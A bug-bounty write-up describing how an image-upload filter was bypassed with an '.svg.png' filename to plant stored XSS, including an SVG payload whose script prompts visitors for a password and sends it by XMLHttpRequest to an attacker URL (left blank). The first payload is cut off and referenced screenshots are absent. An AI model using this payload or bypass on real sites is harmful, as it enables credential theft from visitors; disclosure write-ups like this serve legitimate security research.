How I was rewarded a $1000 bounty after turning a file upload feature into a stored XSS vulnerability leading to credential theft of a visitor to a website.

Hello cyber security researchers and bug hunters, I am posting a writeup after quite a long time. I have been a bit busy lately due to my university studies and also working on some red teaming skills.

Today I decided to post a writeup about a file upload vulnerability that led to stored XSS, followed by credential theft of a victim who is given the URL where the file is uploaded. I think today bug hunters focus more on finding business logic vulnerabilities than technical ones like XSS and SQLi, because of the improved security of web applications. However, there are still places where you can find technical vulnerabilities, like file upload, which I will discuss further in my writeup.

1) Logged into the web application using the provided credentials.

2) Did some manual enumeration:

3) The application had many web forms:

4) As you can see, this form has a variety of text fields. I tried to find vulnerabilities such as SQLi, XSS and SSTI by manually fuzzing the form, with no luck.

The Logo, Background Image and Advertisement Image upload fields caught my attention, and I decided to upload a maliciously crafted file and check what would happen.

5) Uploaded the file, and it generated this error upon upload:

Image file format should be gif,png,jpg or jpeg

6) How I bypassed this:

I renamed the file from

"Fileupload.svg" to "Fileupload.svg.png"

and it uploaded successfully. The check evidently looked only at the filename's final extension, not at the file's contents, so the SVG markup inside went straight through.

7) I then clicked Next and was redirected to an endpoint where I was able to access these files.

All three files were uploaded, as the thumbnails show.

8) Clicked View Image and Boom!

SVG file payload uploaded here:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ""><svg version="1.1" baseProfile="full" xmlns="">

<polygon id="triangle" points="0,0 0,50 50,0" fill="#009901" stroke="#004400"/>

<script type="text/javascript">

Taking it to credential theft by modifying the above payload to:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ""><svg version="1.1" baseProfile="full" xmlns="">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>

<script type="text/javascript">
var passwd = prompt("Enter your password to continue");
var xhr = new XMLHttpRequest();
// the attacker-controlled collection URL goes in the empty string (omitted here)
xhr.open("GET", "" + encodeURI(passwd));
xhr.send();
</script>
</svg>


9) Uploaded the modified payload files again, using a different colour for each:

Files uploaded.

10) Time to access them:

I pressed the Next button after the upload and opened them.

11) I viewed the green SVG image, and the web page responded with the prompt:

Password entered.
As you can see, the password was captured.

Initial Bounty Rewarded:

Additional Locations

Hope you liked the writeup. Happy Hacking !

Cheers :D

Kunal Khubchandani
Cyber Security Analyst | Penetration Tester | Bug Hunter




Student | Hacker | Pentester | Red Teamer | OSCP | OSCE | 19
